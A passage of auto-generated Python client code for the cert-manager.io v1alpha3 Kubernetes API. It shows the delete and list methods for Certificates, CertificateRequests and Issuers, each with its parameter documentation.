# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1StatusV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_namespaced_certificate_request(self, name, namespace, **kwargs): # noqa: E501
"""delete_namespaced_certificate_request # noqa: E501
delete a CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_namespaced_certificate_request(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:param V1DeleteOptionsV2 body:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1StatusV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_namespaced_certificate_request_with_http_info(name, namespace, **kwargs) # noqa: E501
def delete_namespaced_certificate_request_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""delete_namespaced_certificate_request # noqa: E501
delete a CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_namespaced_certificate_request_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:param V1DeleteOptionsV2 body:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1StatusV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'dry_run',
'grace_period_seconds',
'orphan_dependents',
'propagation_policy',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_namespaced_certificate_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `delete_namespaced_certificate_request`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `delete_namespaced_certificate_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'grace_period_seconds' in local_var_params and local_var_params['grace_period_seconds'] is not None: # noqa: E501
query_params.append(('gracePeriodSeconds', local_var_params['grace_period_seconds'])) # noqa: E501
if 'orphan_dependents' in local_var_params and local_var_params['orphan_dependents'] is not None: # noqa: E501
query_params.append(('orphanDependents', local_var_params['orphan_dependents'])) # noqa: E501
if 'propagation_policy' in local_var_params and local_var_params['propagation_policy'] is not None: # noqa: E501
query_params.append(('propagationPolicy', local_var_params['propagation_policy'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1StatusV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_namespaced_issuer(self, name, namespace, **kwargs): # noqa: E501
"""delete_namespaced_issuer # noqa: E501
delete an Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_namespaced_issuer(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:param V1DeleteOptionsV2 body:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1StatusV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_namespaced_issuer_with_http_info(name, namespace, **kwargs) # noqa: E501
def delete_namespaced_issuer_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""delete_namespaced_issuer # noqa: E501
delete an Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_namespaced_issuer_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:param V1DeleteOptionsV2 body:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1StatusV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'dry_run',
'grace_period_seconds',
'orphan_dependents',
'propagation_policy',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_namespaced_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `delete_namespaced_issuer`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `delete_namespaced_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'grace_period_seconds' in local_var_params and local_var_params['grace_period_seconds'] is not None: # noqa: E501
query_params.append(('gracePeriodSeconds', local_var_params['grace_period_seconds'])) # noqa: E501
if 'orphan_dependents' in local_var_params and local_var_params['orphan_dependents'] is not None: # noqa: E501
query_params.append(('orphanDependents', local_var_params['orphan_dependents'])) # noqa: E501
if 'propagation_policy' in local_var_params and local_var_params['propagation_policy'] is not None: # noqa: E501
query_params.append(('propagationPolicy', local_var_params['propagation_policy'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1StatusV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_certificate_for_all_namespaces(self, **kwargs): # noqa: E501
"""list_certificate_for_all_namespaces # noqa: E501
list objects of kind Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_certificate_for_all_namespaces(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_certificate_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
def list_certificate_for_all_namespaces_with_http_info(self, **kwargs): # noqa: E501
"""list_certificate_for_all_namespaces # noqa: E501
list objects of kind Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_certificate_for_all_namespaces_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'allow_watch_bookmarks',
'_continue',
'field_selector',
'label_selector',
'limit',
'pretty',
'resource_version',
'resource_version_match',
'timeout_seconds',
'watch'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_certificate_for_all_namespaces" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'allow_watch_bookmarks' in local_var_params and local_var_params['allow_watch_bookmarks'] is not None: # noqa: E501
query_params.append(('allowWatchBookmarks', local_var_params['allow_watch_bookmarks'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
if 'watch' in local_var_params and local_var_params['watch'] is not None: # noqa: E501
query_params.append(('watch', local_var_params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/certificates', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_certificate_request_for_all_namespaces(self, **kwargs): # noqa: E501
"""list_certificate_request_for_all_namespaces # noqa: E501
list objects of kind CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_certificate_request_for_all_namespaces(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequestList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_certificate_request_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
def list_certificate_request_for_all_namespaces_with_http_info(self, **kwargs): # noqa: E501
"""list_certificate_request_for_all_namespaces # noqa: E501
list objects of kind CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_certificate_request_for_all_namespaces_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequestList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'allow_watch_bookmarks',
'_continue',
'field_selector',
'label_selector',
'limit',
'pretty',
'resource_version',
'resource_version_match',
'timeout_seconds',
'watch'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_certificate_request_for_all_namespaces" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'allow_watch_bookmarks' in local_var_params and local_var_params['allow_watch_bookmarks'] is not None: # noqa: E501
